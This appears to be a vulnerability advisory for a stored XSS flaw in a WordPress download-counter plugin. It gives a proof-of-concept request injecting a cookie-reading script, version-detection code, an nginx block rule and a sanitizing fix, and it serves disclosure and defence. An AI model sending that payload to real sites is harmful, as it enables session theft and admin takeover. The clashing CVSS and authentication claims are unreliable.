How CVE-2025-46240 Works
CVE-2025-46240 is a Stored Cross-Site Scripting (XSS) vulnerability in Jeff Starr’s Simple Download Counter plugin (versions ≤ 2.2). The flaw arises from improper input sanitization during web page generation: attacker-supplied input is written to the download logs without being cleaned and is later rendered unescaped, so malicious JavaScript payloads can be injected into the logs. When an administrator views the logs in the WordPress dashboard, the script executes in the administrator's session, potentially leading to session hijacking, admin takeover, or malware deployment. The injected payload persists until it is manually removed.
DailyCVE Form:
Platform: WordPress
Version: ≤ 2.2
Vulnerability: Stored XSS
Severity: Critical
Date: 04/29/2025
What Undercode Says:
Exploitation:
1. Payload Injection:
POST /wp-admin/admin-ajax.php?action=sd_count_download HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

file_url=/&file_name=<script>alert(document.cookie)</script>
2. Trigger Execution:
Admins opening the download log view (/wp-admin/edit.php?post_type=sd_count) will execute the payload.
Detection:
curl -s "http://target.com/wp-content/plugins/simple-download-counter/" | grep -qE "Version: 2\.[0-2]([^0-9]|$)" && echo "Vulnerable" || echo "Not vulnerable or version not exposed"
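A one-line grep is easy to get wrong: a pattern such as 2.[0-2] also matches 2.10 or 2.20. The following is an added Python version of the check (not from this page's author) that reads the Version: line of a plugin's main-file header or the Stable tag: line of its readme.txt and compares the number numerically against the first fixed release, 2.3, as stated in the mitigation below. The sample file contents are constructed; in practice you would fetch the real file and pass its text to is_vulnerable().

```python
import re
from typing import Optional, Tuple

# Added example. First fixed release according to this page (upgrade to 2.3+).
FIXED_IN: Tuple[int, ...] = (2, 3)

# Matches the "Version:" line of a plugin main-file header (optionally prefixed
# by the " * " of a PHP block comment) or the "Stable tag:" line of readme.txt.
VERSION_RE = re.compile(
    r"^\s*\*?\s*(?:Version|Stable tag):\s*([0-9]+(?:\.[0-9]+)*)",
    re.IGNORECASE | re.MULTILINE,
)


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Return the version as an int tuple, e.g. '2.10' -> (2, 10), or None if absent."""
    match = VERSION_RE.search(text)
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def is_vulnerable(text: str) -> Optional[bool]:
    """True if the parsed version is below FIXED_IN, False if at or above it,
    None if no version could be read (e.g. the host answers 403 for the file)."""
    version = parse_version(text)
    if version is None:
        return None
    return version < FIXED_IN   # tuple comparison: (2, 10) is NOT below (2, 3)


# Constructed samples standing in for fetched plugin files (not real responses).
SAMPLES = {
    "header_2.2": "<?php\n/*\nPlugin Name: Simple Download Counter\nVersion: 2.2\n*/",
    "header_2.10": "/**\n * Plugin Name: Simple Download Counter\n * Version: 2.10\n */",
    "readme_2.3": "=== Simple Download Counter ===\nStable tag: 2.3\n",
    "readme_2.2.1": "=== Simple Download Counter ===\nStable tag: 2.2.1\n",
    "forbidden": "<html><body>403 Forbidden</body></html>",
}


def classify_samples() -> dict:
    """Verdict per sample: True = vulnerable, False = fixed, None = unknown."""
    return {name: is_vulnerable(text) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:14} -> {verdict}")
```

Treat None as "inspect manually" rather than as safe: many hosts block direct reads of plugin files, and the absence of a version string says nothing about the installed release.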
Mitigation:
1. Patch: Upgrade to version 2.3+.
2. WAF Rule:
location ~ /wp-admin/admin-ajax.php {
    # $args covers only the query string; the request shown above carries
    # file_name in the POST body, which plain nginx cannot inspect without a
    # WAF module such as ModSecurity. A URL-encoded "<" (%3C) also escapes
    # this literal match, so treat the rule as a stopgap, not a fix.
    if ($args ~ "file_name=<script") {
        return 403;
    }
}
3. Temporary Fix:
// Add to functions.php ('sd_count_file_name' is the filter hook named on this page).
// This cleans new input only; entries already in the log must still be removed by hand.
add_filter('sd_count_file_name', 'sanitize_text_field');
Analysis:
- CVSS 4.0: `AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H` (9.1 Critical)
- Impact: Full admin compromise, data exfiltration.
- Exploitability: Low skill, no auth required for injection.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode